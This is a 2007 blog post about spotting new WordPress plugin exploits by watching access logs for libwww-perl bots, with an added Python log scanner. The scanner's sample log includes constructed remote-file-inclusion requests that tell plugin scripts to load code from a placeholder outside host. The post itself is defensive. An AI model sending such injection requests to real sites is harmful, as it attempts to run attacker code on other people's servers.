Examining Logs and Sharing Knowledge Can Help Expose Security Flaws
by Scott Allen

Every time a new security exploit is announced, hackers program their botnets to pound sites looking for these obscure holes. By keeping a pulse on our site access logs, I can immediately tell what new security flaws are in existence because of the types of URLs that the bots hit. Normally you would want to be reading security alerts to stay on top of current security exploits, but often hackers know before the exploits get discovered by the security industry, and monitoring your logs can help you discover exploits early.
For example, lately I see a lot of bots trying to access files in the /wp-content/plugins/wordtube/ and /wp-content/plugins/pictpress/ directories and inject code from a third-party site. (The directories don’t exist because neither Wordtube nor Pictpress is installed on any of our blogs.) These access attempts tell you instantly that there is a security exploit in some version of Wordtube and Pictpress, or botnets wouldn’t be trying to inject code into these files. (And from doing a quick search I found Secunia Alerts for both Wordtube and Pictpress, as well as blog posts by others who were affected.) Those are merely a couple of examples, and these change every few days or weeks.
When you have access to enough websites to start seeing some trends (like we do), you start to understand botnet behavior and see how they are like herds. They will feed on one exploit for weeks. (We see them looking for the same types of files.) Then at some point they stampede off to another exploit and feed on that one for a few days or weeks. We usually only see them going after 2-3 different exploits at a time. This happens because the hackers stay on top of security alerts (whether publicly announced on security sites or in private hacker forums) and the instant a new one is released, they program their bots to go after it.
The easiest way to find security flaws like this is to scan your logs for accesses with the user-agent libwww-perl. Statistically, most hackers are low-end and too lazy to change the user-agent, so it’s easy to spot (at least for now). See what files they are trying to access, and whether any of them are recognizable. For an example of what these typically look like, read this post. (The technique discussed will help block many file/code injection exploits, and give the developers time to patch the plugins or applications.)
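Here is an added example of that log scan (my own script, not something from the post or from WebGeek): it parses Apache combined-format lines, keeps only requests whose user-agent contains libwww-perl, counts hits per /wp-content/plugins/<name>/ directory, and flags requests whose query string carries a URL, which is what the code-injection attempts described above look like. The log lines are constructed samples; the file name somefile.php and the 198.51.100.7 host are placeholders, only the two plugin directories come from the post.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
PLUGIN_RE = re.compile(r'^/wp-content/plugins/([^/]+)/')

# Constructed sample entries, not real traffic: the plugin directories are the ones named in
# the post; somefile.php and the third-party host 198.51.100.7 are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Dec/2007:05:01:12 -0800] "GET /wp-content/plugins/wordtube/somefile.php?url=http://198.51.100.7/x.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [20/Dec/2007:05:01:13 -0800] "GET /wp-content/plugins/pictpress/somefile.php?path=http://198.51.100.7/x.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
198.51.100.9 - - [20/Dec/2007:05:02:40 -0800] "GET /2007/12/examining-logs/ HTTP/1.1" 200 8341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0.0.11"
203.0.113.77 - - [20/Dec/2007:05:03:01 -0800] "GET /wp-content/plugins/wordtube/somefile.php?url=http://198.51.100.7/x.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.79"
"""

def parse_line(line):
    """Split one combined-format line into its fields; None if the line does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_remote_include(request):
    """True when a query value is itself a URL, i.e. the request tries to pull code from another site."""
    pairs = parse_qsl(urlsplit(request).query, keep_blank_values=True)
    return any(v.lower().startswith(("http://", "https://")) for _, v in pairs)

def scan_log(lines, agent_marker="libwww-perl"):
    """Return (hits per plugin directory, list of suspicious requests) for the given user-agent."""
    plugins, suspicious = Counter(), []
    for line in lines:
        rec = parse_line(line)
        if rec is None or agent_marker.lower() not in rec["agent"].lower():
            continue
        m = PLUGIN_RE.match(urlsplit(rec["path"]).path)
        if m:
            plugins[m.group(1)] += 1
        if m or is_remote_include(rec["path"]):
            suspicious.append((rec["host"], rec["status"], rec["path"]))
    return plugins, suspicious

if __name__ == "__main__":
    hits, reqs = scan_log(SAMPLE_LOG.splitlines())
    for name, n in hits.most_common():
        print(f"{n:4d}  /wp-content/plugins/{name}/")   # which plugin the herd is feeding on right now
    for host, status, path in reqs:
        print(host, status, path)
```

Point it at a real access_log with `scan_log(open("access_log"))`; a 404 on a plugin directory you do not have is exactly the early-warning signal the post describes.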
(Because we are a web design and internet marketing firm, we have to automate this process. We’ve got a pretty slick system in place so we’re automatically alerted without having to scan our logs manually. We know instantly when botnets are looking for exploits. If you don’t have to manage more than a few web sites, it’s a lot easier to look through your log files manually. There are some open-source scripts that will do it for you as well.)
If you have the plugin or script with the security exploit, it’s probably already been compromised, but if not, you can help out others by spreading the knowledge. Who knows, you could be the first one to find an exploit that isn’t publicly known about. I want to encourage site owners to raise the level of website security awareness. We can help out others in the internet community and reduce hacking incidents by blogging about our findings. Sort of like a blogosphere neighborhood watch. It’s something small that any site owner can do, regardless of skill or experience level, and it will make a difference.
More Info on Website Security:
- Find out about security exploits before you get hacked.
- Subscribe to the Secunia Advisories RSS Feed to be alerted to the latest advisories.
- Read BlogSec to stay abreast of WordPress security issues.
- Sign up for Government US-CERT Alerts.
- If there is an attack on your site (hacking, DDoS, etc.), whether successful or not, report it to law enforcement here and here.
Tags: website security | botnets | hackers | WebGeek
About This Entry
You’re currently reading “Examining Logs and Sharing Knowledge Can Help Expose Security Flaws,” an entry on WebGeek
- Published: 12.20.07 / 5am
- Category: Website Security